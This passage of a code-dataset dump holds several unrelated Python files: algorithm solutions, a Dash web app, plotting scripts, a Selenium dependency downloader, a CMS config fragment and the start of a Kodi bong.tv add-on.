+{"seq_id":"607189586","text":"import math, sys, itertools\ninput = sys.stdin.readline\n\nT = int(input())\n\nfor test_case in range(T):\n N = int(input())\n\n point = []\n total_x = 0\n total_y = 0\n\n for _ in range(N):\n x, y = list(map(int, input().split()))\n point.append([x,y])\n total_x += x\n total_y += y\n\n ret = sys.maxsize\n com = list(itertools.combinations(point, int(N/2)))\n com_len = int(len(com)/2)\n for element in com[:com_len]:\n element = list(element)\n\n x1_total = 0\n y1_total = 0\n for x1, y1 in element:\n x1_total += x1\n y1_total += y1\n\n x2_total = total_x - x1_total\n y2_total = total_y - y1_total\n\n ret = min(ret, math.sqrt((x1_total - x2_total) ** 2 + (y1_total - y2_total) ** 2))\n print(ret)","sub_path":"Algorithm/BOJ/[1007] 벡터 매칭.py","file_name":"[1007] 벡터 매칭.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"642170985","text":"import os\nfrom google_drive_downloader import GoogleDriveDownloader as gdd\n\n\ndef getOSXsrc():\n gids = {\n '1mKgmZ6cJqXFQyVyWshvVKCg4qEVQOEm-':'osx-chrome-releases',\n '108NRuz7EZ8Z2XO1bn5VCJm4rg5P-mWU9':'osx-firefox-releases'\n }\n for gid,name in gids.items():\n dwFileName = os.path.abspath(os.path.join(os.path.dirname(__file__),gid))\n fileName = os.path.abspath(os.path.join(os.path.dirname(__file__), name))\n if not os.path.exists(fileName):\n gdd.download_file_from_google_drive(\n file_id=gid,\n dest_path=dwFileName,\n unzip=True\n )\n os.remove(dwFileName)\n\ndef getSeleniumSrv():\n print(\"get\")\n fileName = os.path.join(os.path.dirname(__file__),'selenium-java.zip')\n fileName_extracted = os.path.join(os.path.dirname(__file__), 'selenium-server-standalone-3.11.0.jar')\n if not os.path.exists(fileName_extracted):\n gdd.download_file_from_google_drive(\n file_id='1IIAWfCV-uHSW75cZRoc5VQd2ZiPDSlxN',\n dest_path=os.path.abspath(fileName),\n unzip=True\n 
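# (Clarifying comment, not in the original getSrc.py.) As far as I can tell,
# download_file_from_google_drive(unzip=True) extracts the archive but leaves
# the downloaded .zip itself on disk, which is why both functions os.remove()
# the archive once extraction has finished.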
)\n os.remove(fileName)\n return True\n\n","sub_path":"Selenium/osx/getSrc.py","file_name":"getSrc.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"3353920","text":"\"\"\"Some people are standing in a row in a park. There are trees between\nthem which cannot be moved. Your task is to rearrange the people by their\nheights in a non-descending order without moving the trees. People can be very tall!\n\nExample\n\nFor a = [-1, 150, 190, 170, -1, -1, 160, 180], the output should be\nsortByHeight(a) = [-1, 150, 160, 170, -1, -1, 180, 190].\"\"\"\n\n\n# newbie - Zimbra\ndef sortByHeight(a):\n q = sorted(a)\n lista = list()\n s = q.count(-1)\n for x, y in enumerate(a):\n if y == -1:\n lista.append(-1)\n s -= 1\n else:\n lista.append(q[x + s])\n return lista\n\n\nprint(sortByHeight([-1, 150, 190, 170, -1, -1, 160, 180]))\n","sub_path":"CodeFights.com/Sort by Height.py","file_name":"Sort by Height.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"102652737","text":"import dash #creating a webpage\nimport dash_core_components as dcc #visual component\nimport dash_html_components as html\nimport plotly.graph_objs as go #employ graphics\nfrom dash.dependencies import Input, Output, State #calling the library\n\n########### Define your variables ######\n\nmyheading1='Which Lego piece you will choose?'\ntabtitle = 'Lego Pieces'\nlist_of_types=['Brick', 'Plate', 'Tile'] #list_of_colors\nlist_of_sizes=['1X2', '2X2', '2X4'] #list_of_numbers\nsourceurl = 'https://github.com/caroleonor/dash-callbacks-multi-input/edit/master/app.py'\ngithublink = 'https://brickarchitect.com/book/bricks/'\n\n\n########## Set up the chart\n\n########### Initiate the app (setting up html and css)\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) #for dash to get the url to display the css style sheet\nserver = app.server\napp.title=tabtitle\n\n########### Set up the layout\n\napp.layout = html.Div(children=[ \n html.H1(myheading1),\n html.Div([\n html.Div([\n dcc.RadioItems( #little circle is radio button\n id='pick-a-type',\n options=[\n {'label':list_of_types[0], 'value':list_of_types[0]},\n {'label':list_of_types[1], 'value':list_of_types[1]},\n {'label':list_of_types[2], 'value':list_of_types[2]},\n ],\n value='choose', #\"choose\" is the action of \"user click\"\n ),\n ],className='two columns'),\n html.Div([\n dcc.RadioItems(\n id='pick-a-size',\n options=[\n {'label':list_of_sizes[0], 'value':list_of_sizes[0]},\n {'label':list_of_sizes[1], 'value':list_of_sizes[1]},\n {'label':list_of_sizes[2], 'value':list_of_sizes[2]},\n ],\n value='one',\n ),\n ],className='two columns'),\n html.Div([\n html.Div(id='your_output_here', children=''), #where the output in the html going to be displayed\n ],className='eight columns'), #calling a section of css format\n ],className='twelve columns'),\n html.Br(),\n html.A('Code on Github', href=githublink),\n html.Br(),\n html.A(\"Data Source\", href=sourceurl),\n ]\n)\n\n########## Define Callback\n\n@app.callback(Output('your_output_here', 'children'),\n [Input('pick-a-type', 'value'),\n Input('pick-a-size', 'value')])\ndef radio_results(type_you_picked, size_you_picked):\n image_you_chose=f'{type_you_picked}-{size_you_picked}.jpg'\n return html.Img(src=app.get_asset_url(image_you_chose), 
style={'width': '100', 'height': '75'}),\n\n############ Deploy\nif __name__ == '__main__':\n app.run_server()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"522006297","text":"# Read File\nimport numpy as np\nimport pandas as pd\n\n\ndef read(file_name):\n data_aux = pd.read_csv(file_name)\n y = data_aux['real']\n x = data_aux['imag']\n chi = data_aux['chi']\n\n return y.array, x.array, chi.array\n\ny, x, z = read('Let.csv')\n#y, x, z = np.genfromtxt(r'data.dat', unpack=True)\n\n#Plot Contour\nimport matplotlib.pyplot as plt\nimport scipy.interpolate\nimport matplotlib.cm as cm\n\nfig = plt.figure(figsize=(6.5, 5))\n\n#print(z)\nsys = plt.tricontourf(x,y,z,levels=[min(z), min(z)+2.30,min(z)+6.18,min(z)+11.83], cmap = 'Reds')\n\nproxy = [plt.Rectangle((0,0),1,1,fc = pc.get_facecolor()[0]) \n for pc in sys.collections]\n\n\n#sys.collections[0].set_label('1 $\\\\sigma$')\n#sys.collections[1].set_label('2 $\\\\sigma$')\n#sys.collections[2].set_label('3 $\\\\sigma$')\n\nplt.legend(proxy, ['1$\\\\sigma$','2$\\\\sigma$','3$\\\\sigma$'],loc='upper right')\n\ny_axis_NAME='Re$\\{[\\\\tilde{L}]_{e\\\\mu}\\}$'\nx_axis_NAME='Im$\\{[\\\\tilde{L}]_{e\\\\mu}\\}$'\n\nplt.xlim([-1.0,1.0])\nplt.ylim([-1.0,1.0])\nplt.ylabel(y_axis_NAME)\nplt.xlabel(x_axis_NAME)\n\nplt.title('Bugey - NSI limits')\nplt.savefig('Let.pdf') \nplt.show()\n","sub_path":"plot/contour_plot_nsi.py","file_name":"contour_plot_nsi.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"261750571","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def hasCycle(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n # Could hash all pointers in a dict - O(n) space\r\n # Or just use two pointers - O(1) space\r\n # aka Floyd's cycle finding algorithm\r\n ptr1 = head\r\n ptr2 = head\r\n\r\n while ptr1 and ptr2 and ptr2.next:\r\n # Advance one pointer by 1 node\r\n # and the other by 2 nodes\r\n ptr1 = ptr1.next\r\n ptr2 = ptr2.next.next\r\n\r\n # If they are the same ptr, there is a cycle\r\n if ptr1 == ptr2:\r\n return True\r\n\r\n return False\r\n","sub_path":"linked-list-cycle.py","file_name":"linked-list-cycle.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"508677384","text":"import FWCore.ParameterSet.Config as cms\n\neventWeightDileptonModelVariation = cms.EDProducer(\"EventWeightDileptonModelVariation\",\n ttGenEvent = cms.InputTag('genEvt'),\n weightVariable = cms.string('toppt'), #valid values: toppt, topeta, toprapidity, ttbarmass, ttbarmasslandau\n slope = cms.double(0),\n weight1x = cms.double(200), #position where weight is 1\n minWeight = cms.double(0.1), #low cut-off, at least 0.1 event weight\n maxWeight = cms.double(2), #high cut-off, at most 2 event weight\n landauMPV = cms.double(4.00132e+02),\n landauSigma = cms.double(3.63534e+01),\n landauMoveX = cms.double(50)\n \n)\n\n\n\n","sub_path":"TopAnalysis/TopUtils/python/EventWeightDileptonModelVariation_cfi.py","file_name":"EventWeightDileptonModelVariation_cfi.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 
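A note on the magic numbers in the plot/contour_plot_nsi.py record above: the contour levels min(z)+2.30, min(z)+6.18 and min(z)+11.83 are the standard delta-chi-square thresholds for 1-, 2- and 3-sigma joint confidence regions when two parameters are fitted (here the real and imaginary parts). A minimal sketch reproducing them, assuming SciPy is available:

# For 2 degrees of freedom the chi-square CDF is 1 - exp(-x/2), so the
# quantile computed below has the closed form -2 * ln(1 - p).
from scipy.stats import chi2

for n_sigma, coverage in [(1, 0.6827), (2, 0.9545), (3, 0.9973)]:
    print(f"{n_sigma} sigma -> delta chi2 = {chi2.ppf(coverage, df=2):.2f}")
# 1 sigma -> delta chi2 = 2.30
# 2 sigma -> delta chi2 = 6.18
# 3 sigma -> delta chi2 = 11.83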
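The linked-list-cycle.py record above states Floyd's cycle-finding algorithm without a driver. A self-contained harness follows, with ListNode reproduced from the commented-out LeetCode stub and has_cycle mirroring Solution.hasCycle; the reason the check works is that once both pointers are inside the cycle, the gap between them shrinks by exactly one node per step, so they must meet.

class ListNode(object):
    def __init__(self, x):
        self.val = x
        self.next = None


def has_cycle(head):
    # Floyd's tortoise-and-hare walk, same logic as Solution.hasCycle above.
    slow = fast = head
    while fast and fast.next:
        slow = slow.next         # one step
        fast = fast.next.next    # two steps
        if slow is fast:         # pointers can only coincide inside a cycle
            return True
    return False


# Build 1 -> 2 -> 3 -> 4, then point the tail back at node 2.
nodes = [ListNode(i) for i in range(1, 5)]
for a, b in zip(nodes, nodes[1:]):
    a.next = b
assert not has_cycle(nodes[0])
nodes[-1].next = nodes[1]
assert has_cycle(nodes[0])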
+{"seq_id":"433588846","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nPosiciones:\n0 -> Step\n1 -> state\n2 (3) -> interval [no usar]\n4 -> reward\n5 -> acc_reward\n6 -> freqpos\n7 -> frequency\n8 -> power\n\"\"\"\n\ndef get_file_data(csv, pos):\n csvf = open(csv, 'r')\n csvflines = csvf.readlines()\n csvf.close()\n \n data = [] \n for line in csvflines[1:]:\n values = line.strip('\\n[]').split(',')\n data.append(float(values[pos]))\n\n # frecuencia en MHz:\n if pos == 7:\n data[-1] = data[-1] / 1000\n \n return data\n\n\n####################\n### COMP AGENTES ###\n####################\n\n\"\"\"\nEntornos: 1, 2, 3\nÉpoca: 5\nTests: 1 (cap:52.5)\n\nDato: potencia\nVariable: entorno\nPotencia objetivo: 52.5 W\n\"\"\"\n\npos = 8 # power\nX = range(0, 201)\n\n# Parámetros de los datos.\nenvs = [1, 2, 3]\npaths = [ f'./FinalEnv0{e}/' for e in envs ]\nchkpt = 5\n\ntest_num = 1\ntests = [ p + f'test-0{test_num}' for p in paths ]\n\ntarget = 52.5\n#################\n# Etiquetas de cada plot.\nlabel_tag = 'env'\nlabels = [ f'{label_tag}: {e}' for e in envs ]\n\n# Color de cada plot.\nclrs = ['blue', 'aquamarine', 'lime']\n\n# Ticks de los ejes.\nmaxY = 18\nstepY = 1\nXticks = np.arange(0, 201, 10)\nYticks = np.arange(0, maxY, stepY)\n\n# Figura\nfig = plt.figure(figsize=(8,6), dpi=150)\nax = fig.add_subplot(111)\n\n# Por cada agente.\nfor test, clr, label in zip(tests, clrs, labels):\n # Por cada test (freq inicial)\n bundle = []\n for it in range(15):\n data = get_file_data(\n test + f'/checkpoint-{chkpt}/iter-{it}.csv',\n pos\n )\n\n bundle.append( [ abs(x - target) for x in data ] )\n \n # Media de los tests.\n bundle = np.array(bundle)\n graph = bundle.mean(axis = 0)\n\n ax.plot(\n X, graph,\n color = clr,\n label = label,\n linestyle = '-',\n linewidth = 0.75,\n marker = '',\n alpha = 1.0\n )\n\n# Línea horizontal con el dato objetivo.\n\"\"\" ax.axhline(\n y = 0,\n xmin = 10 / 220,\n xmax = 1 - (10 / 220),\n color = targetclr,\n linestyle = '-',\n linewidth = 1.0\n) \"\"\"\n\n\n# Eje X\nax.set_xlabel('Time (inference step)')\nax.set_xticks(Xticks)\nax.set_xticklabels(Xticks, rotation = 45)\n\n# Eje Y\nax.set_ylabel('Average power error (W)')\nax.set_yticks(Yticks)\n\n# Grid de la gráfica\nax.grid(\n alpha = 0.25,\n linestyle = ':'\n)\n\n# Leyenda\nax.legend()\n\n# Ruta de guardado\nplt.savefig('6-9.png', bbox_inches='tight')","sub_path":"6-9.py","file_name":"6-9.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"119317432","text":"\n\n\n\n\nt = int(input())\n\nfor _ in range(t):\n n = int(input())\n a = list(map(int,input().split()))\n \n Sum = [0]*(n + 1)\n cnt = [0]*(8001)\n\n for i in range(n):\n Sum[i + 1] = Sum[i] + a[i]\n\n for i in range(n):\n for j in range(i + 2,n + 1):\n if Sum[j] - Sum[i] <= 8000:\n cnt[Sum[j] - Sum[i]] += 1\n\n ans = 0\n for x in a:\n ans += int(cnt[x] > 0)\n print(ans)\n\n","sub_path":"codeforces/Div4_640/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"346893061","text":"#!/usr/bin/python3\nfrom sys import stdin, maxsize\nfrom heapq import heappush, heappop\n\ndbg = False\nif dbg:\n from tracemalloc import start, stop, get_traced_memory\n start () # for tracing memory allocation\n\ndef main ():\n read = stdin.readline\n n, m = map (int, read ().split ())\n g = dict ()\n wd = dict () # weights of edges dict\n dd = dict () # 
distance dict\n dist = 0\n u, v, w = map (int, read ().split ())\n g [u] = [v]\n wd [(u, v)] = [w]\n dd [u] = maxsize\n dd [v] = maxsize\n if dbg: mxwd = 0\n for m_ in range (1, m):\n u, v, w = map (int, read ().split ())\n if (u, v) in wd:\n wd [(u, v)].append (w)\n if dbg and len (wd [(u, v)]) > mxwd: mxwd = len (wd [(u, v)])\n else:\n wd [(u, v)] = [w]\n if u in g: g [u].append (v)\n else:\n g [u] = [v]\n dd [u] = maxsize\n dd [v] = maxsize\n k = int (read ()) # number of special vertices\n svl = set (map (int, read ().split ())) # special vertices set\n x, y = map (int, read ().split ())\n #print (\"x y\", x, y, g [x])\n if x in svl and y in svl: print (-1); return\n dd [x] = 0\n wd [(0, x)] = [0]\n hp = []\n reachedy = False\n s = x if x in svl else 0\n if dbg:\n par = dict ()\n par [(x, 0, 0)] = (0, 0, 0)\n last = (x, 0, 0)\n #hc = dict ()\n mx = 0\n used = set ()\n if x == y:\n if s: print (0)\n else: print (-1)\n return\n if x not in g: print (-1); return\n\n '''# remove unneccesary edges to overcome \"Memory limit exceeded\"\n print (len (wd))\n seen = set ()\n s = 0\n if dbg:\n # for tracing memory allocation\n current, peak = get_traced_memory ()\n print (f\"Current memory usage is {current / 1024} kB; Peak was {peak / 1024} kB\")\n\n #bfs from x to y\n uy = False\n from collections import deque\n qu = deque ()\n qu.append (x)\n while qu:\n u = qu.popleft ()\n if u in svl: s = u\n if u == y: uy =True\n if uy and s: break\n if u in seen or u not in g: continue\n seen.add (u)\n for v in g [u]:\n qu.append (v)\n if dbg: print (\"n seen\", n, len (seen))\n\n # bfs from y to x\n ux = False\n seen2 = set ()\n qu = deque ()\n qu.append (y)\n while qu:\n u = qu.popleft ()\n if u in svl: s = u\n if u == x: ux =True\n if ux and s: break\n if u in seen2 or u not in g: continue\n seen2.add (u)\n for v in g [u]:\n qu.append (v)\n seen |= seen2\n if dbg:\n print (\"n seen2\", n, len (seen2))\n print (\"seen total\", len (seen))\n \n to_remove = []\n for u, v in wd:\n if u not in seen or v not in seen: to_remove.append ((u, v))\n for uv in to_remove:\n del wd [uv]\n if dbg:\n print (len (wd))\n print (96212 in seen, 98737 in seen)\n #return\n\n if dbg:\n # for tracing memory allocation\n current, peak = get_traced_memory ()\n print (f\"Current memory usage is {current / 1024} kB; Peak was {peak / 1024} kB\")\n #return'''\n\n for v in g [x]:\n if s and v in svl: continue\n if dbg: used.add (v)\n for vw in sorted (wd [(x, v)], reverse = True):\n ndist = dist + vw\n if dbg: print (\"pre\", x, v, vw, ndist)\n if (v != y or v == y and s or v == y and v in svl):\n if ndist < dd [v]:\n dd [v] = ndist\n heappush (hp, (ndist, vw, v, x, s))\n if dbg:\n print (\"pre push\", ndist, vw, v, x, s)\n if (v, x, vw) not in par or par [(v, x, vw)][0] != x:\n par [(v, x, vw)] = (x, 0, 0)\n #if (v, x, 0) in hc: hc [(v, x, 0)] += 1\n #else: hc [(v, x, 0)] = 1\n elif v == y:\n heappush (hp, (ndist, vw, v, x, s))\n if dbg:\n print (\"pre push extra\", ndist, vw, v, x, s)\n if (v, x, vw) not in par or par [(v, x, vw)][0] != x:\n par [(v, x, vw)] = (x, 0, 0)\n #if (v, x, 0) in hc: hc [(v, x, 0)] += 1\n #else: hc [(v, x, 0)] = 1\n hps = set () # control (v, u)'s on heap with s\n seen = dict ()\n while hp:\n if dbg and len (hp) > mx: mx = len (hp)\n dis, lw, u, parent, s = heappop (hp)\n if not s: s = u if u in svl else 0\n if dbg and u == 19: print (\"19 reached\", dis, s)\n dist = dis\n if u == y:\n if s:\n reachedy = True;\n break\n if dbg: print (\"next\", u, parent, dis, end = \" \")\n if u not in g: continue\n lw05 
= .5 * lw; lw2 = 2 * lw\n for v in g [u]:\n if (s and v in svl) or (v, u, parent) in seen and seen [(v, u, parent)] > 1: continue\n if (v, u, parent) in seen: seen [(v, u, parent)] += 1\n else: seen [(v, u, parent)] = 1\n if (u, v) not in wd: continue\n for vw in sorted (wd [(u, v)], reverse = True):\n if vw < lw05: break\n ndist = dist + vw\n if dbg: print (\" \", u, v, lw05, vw, lw2, s, dd [v], ndist)\n if lw05 <= vw <= lw2:\n if dbg: used.add ((u, v, vw))\n if v != y or v == y and s or v == y and v in svl:\n if ndist < dd [v]:\n dd [v] = ndist\n heappush (hp, (ndist, vw, v, u, s))\n if dbg:\n print (\"push\", ndist, vw, v, u, s)\n if (v, u, vw) not in par or par [(v, u, vw)][0] != u:\n par [(v, u, vw)] = (u, parent, lw)\n if v == y: last = (v, u, vw)\n #if (v, u, parent) in hc: hc [(v, u, parent)] += 1\n #else: hc [(v, u, parent)] = 1\n elif s and (v, u) not in hps:# and ndist < 22099:\n if dbg:\n print (\"push additional s\", dd [v], \"->\", ndist, vw, v, u, s)\n if (v, u, vw) not in par or par [(v, u, vw)][0] != u:\n par [(v, u, vw)] = (u, parent, lw)\n if v == y: last = (v, u, vw)\n #if (v, u, parent) in hc: hc [(v, u, parent)] += 1\n #else: hc [(v, u, parent)] = 1\n #dd [v] = ndist\n hps.add ((v, u))\n heappush (hp, (ndist, vw, v, u, s))\n elif v == y:\n heappush (hp, (ndist, vw, v, u, s))\n if dbg:\n if (any (i in svl for i in g [v])) and ((v, u, vw) not in par or par [(v, u, vw)][0] != u):\n print (\"extra par [(\", v, \",\", u, \",\", vw, \")] = (\", u, \",\", parent, \",\", lw, \")\", dd [v], ndist, s)\n par [(v, u, vw)] = (u, parent, lw)\n if v == y: last = (v, u, vw)\n #if (v, u, parent) in hc: hc [(v, u, parent)] += 1\n #else: hc [(v, u, parent)] = 1\n if reachedy: print (dist)\n else: print (-1)\n if dbg: \n total = 0\n print (\"final current path reversed (node, parent, distance) from\", y, \"to\", x) #,par)\n u = last\n total += u [2]\n print (f\"{u}\", end = \" \")\n try:\n while par [u][0]:\n u = par [u]\n total += u [2]\n print (f\"{u}\", end = \" \")\n except IndexError: print (u, par [u])\n print (\" total:\", total)\n #print (hc)\n print (\"length heap\", mx)\n print (\"mxwd length\", mxwd)\n print (\"m / used edges\", m, \"/\", len (used))\n \n # for tracing memory allocation\n current, peak = get_traced_memory ()\n print (f\"Current memory usage is {current / 1024} kB; Peak was {peak / 1024} kB\")\n\nif __name__ == \"__main__\":\n main ()\n if dbg: stop () # for tracing memory allocation","sub_path":"_minimum_valid_path.py","file_name":"_minimum_valid_path.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"133212983","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2015 Christian Maugg\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS 
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\n\nCHANGELOG\n=========\n\n2.0\n===\n* first public release\n\n\"\"\"\n\nfrom xbmcswift2 import xbmc\nfrom xbmcswift2 import xbmcgui\n\nimport functools\nimport operator\nimport os\nimport sys\nimport time\nimport xbmcswift2\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), 'resources', 'lib'))\n\nimport pybongtvapi\n\nplugin = xbmcswift2.Plugin()\naddon_icon = plugin.addon.getAddonInfo('icon')\naddon_name = plugin.addon.getAddonInfo('name')\n\npybongtvapi.DEFAULT_COOKIE_DIR = os.path.join(plugin.storage_path, '..', '.pybongtvapi', 'cookies')\n\nCONTENT_TYPES = VIDEOS, EPISODES, MOVIES = 'videos', 'episodes', 'movies'\n\n# xbmc translation identifiers\n# the addon's translation identifiers\nTR_AUTHORIZATION_ERROR = 30000 # en: Authorization Error! de: Anmeldung fehlgeschlagen!\nTR_UPDATE_CREDENTIALS = 30001 # en: Please update your BONG.TV username and password, de: Bitte bong.tv-Benutzernamen und -Passwort aktualisieren\nTR_BONGSPACE = 30002 # en: BongSpace de: BongSpace\nTR_BONGGUIDE = 30003 # en: BongGuide de: BongGuide\nTR_SEARCH_BROADCASTS = 30004 # en: Search broadcasts de: Suche Sendungen\nTR_X_BROADCASTS_RECORDED = 30005 # en: {0} broadcasts recorded de: {0} Sendungen aufgenommen\nTR_MANAGE_X_BROADCASTS = 30006 # en: Manage {0} broadcasts de: {0} Sendungen verwalten\nTR_NO_RECORDINGS_FOUND = 30007 # en: No recordings found! de: Keine Aufnahmen gefunden!\nTR_TITLE_DELETE_RECORDING = 30008 # en: Delete Recording? de: Aufnahme löschen?\nTR_DELETE_RECORDING = 30009 # en: Delete recording \"{0}\"? de: Aufnahme \"{0}\" löschen?\nTR_CANNOT_DELETE_RECORDING = 30010 # en: Cannot delete recording \"{0}\"! de: \"{0}\" kann nicht gelöscht werden!\nTR_RECORDING_DELETED = 30011 # en: \"{0}\" deleted successfully. de: \"{0}\" erfolgreich gelöscht.\nTR_TITLE_RECORD_BROADCAST = 30012 # en: Record broadcast? de: Aufnahme tätigen?\nTR_RECORD_BROADCAST = 30013 # en: Record broadcast \"{0}\"? de: Sendung \"{0}\" aufzeichnen?\nTR_CANNOT_RECORD_BROADCAST = 30014 # en: Cannot record broadcast \"{0}\"! 
de: \"{0}\" kann nicht aufgezeichnet werden!\nTR_WILL_RECORD_BROADCAST = 30015 # en: \"{0}\" is scheduled for recording de: \"{0}\" wird aufgezeichnet\nTR_NEXT_DAYS_BROADCASTS = 30016 # en: Broadcasts from {0} de: Sendungen vom {0}\nTR_PREVIOUS_DAYS_BROADCASTS = 30017 # en: Broadcasts from {0} de: Sendungen vom {0}\nTR_LIST_OF_BROADCASTS = 30018 # en: List of channels de: Senderliste\nTR_TITLE_SEARCH_MATCHING_BROADCASTS = 30019 # en: Search broadcasts de: Suche Sendungen\nTR_X_MATCHING_BROADCASTS_FOUND = 30020 # en: Found {0} matching broadcasts for search term \"{1}\" de: {0} passende Sendungen für den Suchbegriff \"{1}\" gefunden\nTR_NO_MATCHING_BROADCASTS_FOUND = 30021 # en: No matching broadcasts found for search term \"{0}\" de: Keine passenden Sendungen für den Suchbegriff \"{0}\" gefunden!\n\n\n# xbmc utils/helpers\ndef get_view_mode_id():\n if plugin.get_setting('force_view_mode', converter=bool):\n return plugin.get_setting('view_mode_id', converter=int)\n\n\ndef get_content_type():\n if plugin.get_setting('force_content_type', converter=bool):\n return plugin.get_setting('content_type', converter=str)\n\n\ndef use_extended_broadcast_details():\n return plugin.get_setting('use_extended_broadcast_details', converter=bool)\n\n\ndef normalize_title(broadcast, include_time=True, include_channel_name=False):\n label = ('{0.title}: {0.subtitle}'.format(broadcast) if broadcast.is_tvshow() else broadcast.title)\n if include_time:\n label = time.strftime('%d.%m, %H:%M: ', broadcast.starts_at) + label\n if include_channel_name:\n label = (broadcast.channel_name + (', ' if include_time else ': ') + label)\n return label\n\n\ndef new_broadcast_item(broadcast, path=None, include_time=True, include_channel_name=False):\n label = normalize_title(broadcast, include_time=include_time, include_channel_name=include_channel_name)\n broadcast_details = dict(\n genre=', '.join(broadcast.categories),\n year=broadcast.production_year,\n episode=broadcast.episode,\n season=broadcast.season,\n plot=broadcast.plot if use_extended_broadcast_details() else broadcast.outline,\n plotoutline=broadcast.outline,\n title=broadcast.subtitle if broadcast.is_tvshow() else broadcast.title,\n duration=broadcast.duration,\n tagline=broadcast.subtitle,\n tvshowtitle=broadcast.title if broadcast.is_tvshow() else None,\n aired=time.strftime('%Y-%m-%d', broadcast.starts_at),\n )\n properties = dict(fanart_image=broadcast.thumb_url)\n return dict(label=label, label2=broadcast.subtitle, icon=broadcast.channel_logo_url, thumbnail=broadcast.thumb_url,\n path=path, properties=properties, info=broadcast_details, info_type='video')\n\n\ndef new_recording_item(recording, path=None, include_time=True, include_channel_name=False):\n item = new_broadcast_item(recording, path=path, include_time=include_time,\n include_channel_name=include_channel_name)\n if recording.is_recorded() and path is None:\n item.update(is_playable=True, path=recording.url)\n elif recording.is_recorded() and path is not None:\n item.update(label=' * ' + item['label'])\n return item\n\n\ndef new_channel_item(channel, path):\n return dict(label=channel.name, icon=channel.logo_url, thumbnail=channel.logo_url, path=path, info_type='video')\n\n\ndef finish(items, content_type=None, view_mode_id=None):\n if content_type in CONTENT_TYPES or get_content_type():\n plugin.set_content(content_type if content_type in CONTENT_TYPES else get_content_type())\n return plugin.finish(items, view_mode=view_mode_id or get_view_mode_id())\n\n\ndef notify(msg):\n if msg and 
isinstance(msg, basestring):\n xbmc.executebuiltin('Notification(\"' + addon_name + '\", \"' + msg + '\", \"5000\", \"' + addon_icon + '\")')\n\n\ndef refresh_view(msg=None):\n if msg and isinstance(msg, basestring):\n notify(msg)\n xbmc.executebuiltin('Container.Refresh')\n\n\ndef update_view(url, msg=None):\n if not isinstance(url, basestring):\n raise TypeError()\n if msg and isinstance(msg, basestring):\n notify(msg)\n xbmc.executebuiltin('Container.Update(' + url + ')')\n\n\ndef tr(msg_id, *a, **kw):\n return (plugin.get_string(int(msg_id)) or '').encode('utf-8').format(*a, **kw)\n\n\n# bong.tv utils/helpers\ndef new_api():\n return pybongtvapi.API(credentials=pybongtvapi.UserCredentials(plugin.get_setting('username'),\n plugin.get_setting('password')))\n\n\ndef new_epg():\n return pybongtvapi.EPG(new_api())\n\n\ndef new_pvr():\n return pybongtvapi.PVR(new_api())\n\n\ndef requires_authorization(wrapped):\n def wrapper(*a, **kw):\n for _ in range(3):\n try:\n return wrapped(*a, **kw)\n except pybongtvapi.AuthorizationError:\n xbmcgui.Dialog().ok(tr(TR_AUTHORIZATION_ERROR), tr(TR_UPDATE_CREDENTIALS))\n plugin.open_settings()\n\n return functools.update_wrapper(wrapper, wrapped)\n\n\n@requires_authorization\ndef get_recordings():\n return new_pvr().recordings\n\n\n@requires_authorization\ndef get_channels():\n return new_epg().channels\n\n\n@requires_authorization\ndef get_channel(channel_id):\n return new_epg().get_channel(channel_id)\n\n\n# addon routing\n@plugin.route('/')\ndef page_index():\n items = [\n dict(label=tr(TR_BONGSPACE), path=plugin.url_for('page_pvr')),\n dict(label=tr(TR_BONGGUIDE), path=plugin.url_for('page_epg')),\n 